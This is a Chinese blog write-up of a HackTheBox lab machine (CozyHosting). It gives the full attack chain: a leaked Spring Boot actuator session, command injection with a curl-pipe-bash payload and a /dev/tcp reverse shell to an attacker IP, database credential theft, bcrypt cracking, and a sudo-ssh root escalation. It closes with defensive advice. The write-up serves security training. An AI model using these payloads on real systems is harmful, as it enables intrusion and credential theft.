HTB CozyHosting 渗透测试详细记录

你是慕鸢呀~ 发布于 29 天前 11 次阅读 3163 字 预计阅读时间: 14 分钟

HTB CozyHosting 靶机渗透测试详细记录

🔍 初始侦察

端口扫描

首先使用 Nmap 进行快速端口扫描:

nmap -sT -min-rate 20000 10.10.11.230

扫描结果显示开放了两个端口:

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

对这两个开放端口进行更详细的服务版本探测:

nmap -sT -sC -sV -O -p22,80 10.10.11.230

探测结果:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_  256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)

关键信息:

  • SSH 服务:OpenSSH 8.9p1
  • HTTP 服务:nginx 1.18.0
  • 网站自动重定向到 http://cozyhosting.htb 域名

🌐 Web应用侦察

配置本地hosts文件

为了能够访问目标网站,需要在本地hosts文件中添加域名解析:

echo "10.10.11.230 cozyhosting.htb" | sudo tee -a /etc/hosts

web技术栈识别

访问 http://cozyhosting.htb 发现网站使用 Bootstrap v5.2.3 前端框架,查看源代码找到以下注释:

<!-- =======================================================
* Template Name: FlexStart
* Updated: Mar 10 2023 with Bootstrap v5.2.3
* Template URL: https://bootstrapmade.com/flexstart-bootstrap-startup-template/
* Author: BootstrapMade.com
* License: https://bootstrapmade.com/license/
======================================================== -->

目录遍历

使用 feroxbuster 进行目录扫描:

feroxbuster -u http://cozyhosting.htb/

发现一个特殊的错误页面:http://cozyhosting.htb/error

错误内容显示这是一个 Spring Boot 应用程序:

Whitelabel Error Page

This application has no explicit mapping for /error, so you are seeing this as a fallback.
Fri Apr 04 08:15:44 UTC 2025
There was an unexpected error (type=None, status=999).

🔧 Spring Boot攻击面探测

创建针对Spring Boot的字典

根据发现的框架信息,生成包含常见Spring Boot路径的字典文件,重点关注actuator端点。

%20/swagger-ui.html
actuator
actuator/auditevents
actuator/beans
actuator/conditions
actuator/configprops
actuator/env
actuator/flyway
actuator/health
actuator/heapdump
actuator/httptrace
actuator/hystrix.stream
actuator/info
actuator/integrationgraph
actuator/jolokia
actuator/liquibase
actuator/logfile
actuator/loggers
actuator/mappings
actuator/metrics
actuator/prometheus
actuator/scheduledtasks
actuator/sessions
actuator/shutdown
actuator/startup
actuator/swagger-ui.html
actuator/threaddump
actuator/trace
api
api-docs
api.html
api/doc
api/index.html
api/swagger
api/swagger-ui.html
api/swagger/ui
api/swaggerui
api/v2/api-docs
app
application.properties
application.yml
auditevents
autoconfig
beans
caches
cloudfoundryapplication
conditions
configprops
distv2/index.html
docs
doc.html
docs/
druid/index.html
druid/login.html
druid/websession.html
dubbo-provider/distv2/index.html
dump
entity/all
env
env/(name)
error
eureka
flyway
gateway/actuator
gateway/actuator/auditevents
gateway/actuator/beans
gateway/actuator/conditions
gateway/actuator/configprops
gateway/actuator/env
gateway/actuator/health
gateway/actuator/heapdump
gateway/actuator/httptrace
gateway/actuator/hystrix.stream
gateway/actuator/info
gateway/actuator/jolokia
gateway/actuator/logfile
gateway/actuator/loggers
gateway/actuator/mappings
gateway/actuator/metrics
gateway/actuator/scheduledtasks
gateway/actuator/swagger-ui.html
gateway/actuator/threaddump
gateway/actuator/trace
health
heapdump
heapdump.json
httptrace
hystrix
hystrix.stream
info
integrationgraph
intergrationgraph
internal
jolokia
jolokia/list
libs/swaggerui
liquibase
logfile
loggers
login
management
management/health
mappings
metrics
monitor
prometheus
refresh
scheduledtasks
sessions
shutdown
spring
spring-security-oauth
spring-security-oauth-resource/swagger-ui.html
spring-security-rest
spring-security-rest/api/swagger-ui.html
startup
static/swagger.json
sw/swagger-ui.html
swagger
swagger-dubbo/api-docs
swagger-resources
swagger-resources/configuration/security
swagger-resources/configuration/ui
swagger-ui
swagger-ui.html
swagger-ui/html
swagger-ui/index.html
swagger/codes
swagger/index.html
swagger/static/index.html
swagger/swagger-ui.html
swagger/ui
swagger/v1/swagger.json
swagger/v2/swagger.json
Swagger/ui/index
system/druid/index.html
template/swagger-ui.html
threaddump
trace
user/swagger-ui.html
v1.1/swagger-ui.html
v1.2/swagger-ui.html
v1.3/swagger-ui.html
v1.4/swagger-ui.html
v1.5/swagger-ui.html
v1.6/swagger-ui.html
v1.7/swagger-ui.html
v1.8/swagger-ui.html
v1.9/swagger-ui.html
v2.0/swagger-ui.html
v2.1/swagger-ui.html
v2.2/swagger-ui.html
v2.3/swagger-ui.html
v2/api-docs
v2/swagger.json
v3/api-docs
v1/api-docs
webpage/system/druid/index.html

使用Gobuster进行精确扫描

gobuster dir -u http://cozyhosting.htb -w springboot.txt

遍历结果:

/actuator             (Status: 200) [Size: 634]
/actuator/health      (Status: 200) [Size: 15]
/actuator/env         (Status: 200) [Size: 4957]
/actuator/mappings    (Status: 200) [Size: 9938]
/actuator/sessions    (Status: 200) [Size: 48]
/actuator/beans       (Status: 200) [Size: 127224]
/error                (Status: 500) [Size: 73]
/login                (Status: 200) [Size: 4431]

🔐 信息泄露利用

分析Actuator端点信息

访问 http://cozyhosting.htb/actuator 发现多个敏感端点:

{
  "_links": {
    "self": {
      "href": "http://localhost:8080/actuator",
      "templated": false
    },
    "sessions": {
      "href": "http://localhost:8080/actuator/sessions",
      "templated": false
    },
    "beans": {
      "href": "http://localhost:8080/actuator/beans",
      "templated": false
    },
    "health": {
      "href": "http://localhost:8080/actuator/health",
      "templated": false
    },
    "health-path": {
      "href": "http://localhost:8080/actuator/health/{*path}",
      "templated": true
    },
    "env": {
      "href": "http://localhost:8080/actuator/env",
      "templated": false
    },
    "env-toMatch": {
      "href": "http://localhost:8080/actuator/env/{toMatch}",
      "templated": true
    },
    "mappings": {
      "href": "http://localhost:8080/actuator/mappings",
      "templated": false
    }
  }
}

获取用户会话信息

访问 http://cozyhosting.htb/actuator/sessions 获取到用户户kanderson的cookie会话:

{"20A3E4D50FACFEB1E9E0E877C80B3EBC":"kanderson"}

分析API端点

访问 http://cozyhosting.htb/actuator/mappings 发现一个可疑的API端点:

分析如下 类名 htb.cloudhosting.compliance.ComplianceService 方法名 executeOverSsh 看起来很像是一个执行ssh命令的方法名 参数 HttpServletResponse 用于返回结果 漏洞分析: 这个接口很可能存在命令注入漏洞,因为它接受外部输入并通过 SSH 执行命令 没有看到任何安全注解或权限检查,可能没有适当的授权控制 方法名和类名表明这可能是一个内部管理功能 突破思路分析: 尝试通过 POST 请求访问 /executessh 端点 根据方法参数,可能需要提供两个参数

但是目前没什么思路,继续尝试

{
  "handler": "htb.cloudhosting.compliance.ComplianceService#executeOverSsh(String, String, HttpServletResponse)",
  "predicate": "{POST [/executessh]}",
  "details": {
    "handlerMethod": {
      "className": "htb.cloudhosting.compliance.ComplianceService",
      "name": "executeOverSsh",
      "descriptor": "(Ljava/lang/String;Ljava/lang/String;Ljakarta/servlet/http/HttpServletResponse;)V"
    },
    "requestMappingConditions": {
      "consumes": [],
      "headers": [],
      "methods": [
        "POST"
      ],
      "params": [],
      "patterns": [
        "/executessh"
      ],
      "produces": []
    }
  }
}

💉 会话劫持与命令注入

劫持管理员会话

在之前步骤中,我们拿到了用户kanderson的cookie,使用获取到的cookie劫持会话:

GET /admin HTTP/1.1
Host: cozyhosting.htb
Cookie: JSESSIONID=20A3E4D50FACFEB1E9E0E877C80B3EBC

成功进入管理后台,发现底部有自动修补功能,需要输入hostname和username,这似乎和之前的接口executessh很相似,尝试抓取数据包

数据包如下

POST /executessh HTTP/1.1
Host: cozyhosting.htb
Content-Length: 29
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://cozyhosting.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cozyhosting.htb/admin
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=81DD951EB84E65A9CF45B8083ECA7292
Connection: keep-alive

host=127.0.0.1&username=admin

分析命令注入点

抓取自动修补功能的请求:

POST /executessh HTTP/1.1
Host: cozyhosting.htb
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=81DD951EB84E65A9CF45B8083ECA7292

host=127.0.0.1&username=admin

发现请求失败并返回错误:

The host was not added!
Host key verification failed.

根据据错误消息,以及它表示正在使用私钥,服务器很可能正在运行 ssh -i [key] [username]@[hostname] 的命令,如果是这样,我可以尝试命令注入漏洞。

🐚 命令注入与反弹Shell

测试命令注入

尝试在username参数中注入id命令:

POST /executessh HTTP/1.1
Host: cozyhosting.htb
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=A37A39D9F3E20676A2C9EAFCE3512410

host=127.0.0.1&username=admin%3Bid

收到错误响应:

The host was not added!
ssh: Could not resolve hostname admin: Temporary failure in name resolution/bin/bash: line 1: id@127.0.0.1: command not found

绕过空格限制

而且由于主机名校验严格,命令中不能有空格,无法使用空格,使用${IFS}作为空格的替代:

# 本地启动HTTP服务
python3 -m http.server 8000

# 构造有效载荷
admin;curl${IFS}http://10.10.16.16:8000;

发送之前去cozyhosting.htb/actuator/sessions获取最新的cookie并替换

发送注入后的请求并成功收到来自目标的HTTP请求,证明命令执行成功。

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.230 - - [04/Apr/2025 20:10:30] "GET / HTTP/1.1" 200 -

构建反弹Shell

开启nc监听,构造反弹shell脚本 并放在启动python http服务的目录,

# 本地监听
nc -lvnp 9999

# 创建反弹shell脚本
echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.10.16.16/9999 0>&1' > rce.sh

构造最后的攻击载荷,让目标下载rce.sh并执行,不出意外的话,我们就可以getshell

# 最终利用载荷
admin;curl${IFS}http://10.10.16.16:8000/rce.sh|bash;

成功getshell:

listening on [any] 9999 ...
connect to [10.10.16.16] from (UNKNOWN) [10.10.11.230] 52656
sh: 0: can't access tty; job control turned off
$ id
uid=1001(app) gid=1001(app) groups=1001(app)

📦 内部信息收集

获取更稳定的Shell

使用 script 命令通过 bash 创建一个新的 PTY终端

script /dev/null -c bash

分析JAR包配置

发现并解压应用程序JAR包:

unzip -d /tmp/app cloudhosting-0.0.1.jar
cd /tmp/app

查看Spring Boot配置文件:

application.properties是springboot的配置文件,需要重点关注

cat /tmp/app/BOOT-INF/classes/application.properties

获取到数据库凭据:

spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

💾 数据库渗透

连接PostgreSQL数据库

psql -h 127.0.0.1 -U postgres -W
Password: Vg&nvzAQ7XxR

枚举数据库资源

注意事项: 如果命令行头部出现长串(END),输入q回车就能恢复正常

-- 列出可用数据库
\list

-- 连接到cozyhosting数据库
\connect cozyhosting

-- 列出所有表
\dt

-- 查询用户表数据
select * from users;

查询结果:

   name    |                           password                           | role  
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

🔓 密码破解

识别密码哈希类型

hashid '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'

识别结果:

Analyzing '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
[+] Blowfish(OpenBSD) 
[+] Woltlab Burning Board 4.x 
[+] bcrypt

使用Hashcat破解密码

bcrypt 在Hashcat中的编号是3200,将hash值写入文件并开始爆破

echo '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm' > hash
hashcat hash -m 3200 /usr/share/wordlists/rockyou.txt

成功破解出密码:manchesterunited

$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Fri Apr  4 21:15:41 2025 (17 secs)
Time.Estimated...: Fri Apr  4 21:15:58 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      164 H/s (5.80ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2816/14344385 (0.02%)
Rejected.........: 0/2816 (0.00%)
Restore.Point....: 2752/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Candidate.Engine.: Device Generator
Candidates.#1....: bebito -> medicina
Hardware.Mon.#1..: Util: 81%

🚩 获取User Flag

查看系统用户

cat /etc/passwd

发现用户josh:

josh:x:1003:1003::/home/josh:/usr/bin/bash

使用破解的密码登录

ssh josh@cozyhosting.htb
# 密码: manchesterunited

获取user flag:

josh@cozyhosting:~$ cat user.txt
65279bb4837e0b6b9daacff5d5b2396c

🔝 权限提升

分析sudo权限

sudo -l

输出结果:

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *

这意味着当前用户可以使用root权限执行ssh

我可以利用这个来实现提权 通过查阅SSH文档,我发现可以使用SSH的-o参数来指定特定选项。具体来说:

可以使用PermitLocalCommand=yes选项,这个选项允许在SSH连接成功建立后执行本地命令。 然后可以使用LocalCommand=/bin/bash选项来指定在连接成功后要执行的本地命令。这里设置为执行/bin/bash,这意味着连接成功后会打开一个bash shell。 由于SSH命令是以root权限运行的(通过sudo),这个bash shell也会继承root权限,从而实现提权。

利用SSH命令提权

通过SSH的特殊参数进行提权:

sudo /usr/bin/ssh -v -o PermitLocalCommand=yes -o 'LocalCommand=/bin/bash' josh@127.0.0.1

成功获得root权限:

root@cozyhosting:/home/josh# id
uid=0(root) gid=0(root) groups=0(root)

🏁 获取Root Flag

root@cozyhosting:/home/josh# cat /root/root.txt
0a5b294329801b320d5fb71a8b3d52b8

🔄 攻击流程总结

  1. 侦察阶段:通过端口扫描发现开放的SSH和HTTP服务

  2. Web应用探测:识别出Spring Boot应用并发现Actuator端点暴露

  3. 漏洞利用链 :

  • 利用Sessions Actuator获取管理员会话
  • 利用Mappings Actuator发现命令执行接口
  • 通过命令注入获取反弹Shell

  1. 横向移动

  • 从应用配置文件中获取数据库凭据
  • 从数据库中获取并破解密码哈希
  • 使用破解的密码登录SSH获取用户权限
  1. 权限提升:利用受限的sudo权限执行SSH命令实现提权

🛠️ 使用的工具

  • 网络扫描:Nmap
  • Web目录扫描:Feroxbuster、Gobuster
  • 密码破解:Hashcat
  • Hash识别:Hashid
  • 数据库操作:PostgreSQL客户端

🔍 关键漏洞点

  1. Spring Boot Actuator暴露:泄露了敏感的系统和应用信息
  2. 命令注入漏洞executeOverSsh方法未对用户输入进行适当过滤
  3. 凭据存储不当:明文存储数据库密码
  4. 较弱的密码策略:可被字典攻击破解的密码
  5. 不当的sudo配置:允许用户以root权限执行特定命令

📚 安全建议

  1. 禁用或限制生产环境中的Spring Boot Actuator
  2. 对所有用户输入实施严格过滤和验证
  3. 使用环境变量或安全的配置管理工具存储敏感凭据
  4. 实施强密码策略并定期轮换凭据
  5. 遵循最小权限原则配置sudo权限
我本桀骜少年臣,不信鬼神不信人。
最后更新于 2025-04-12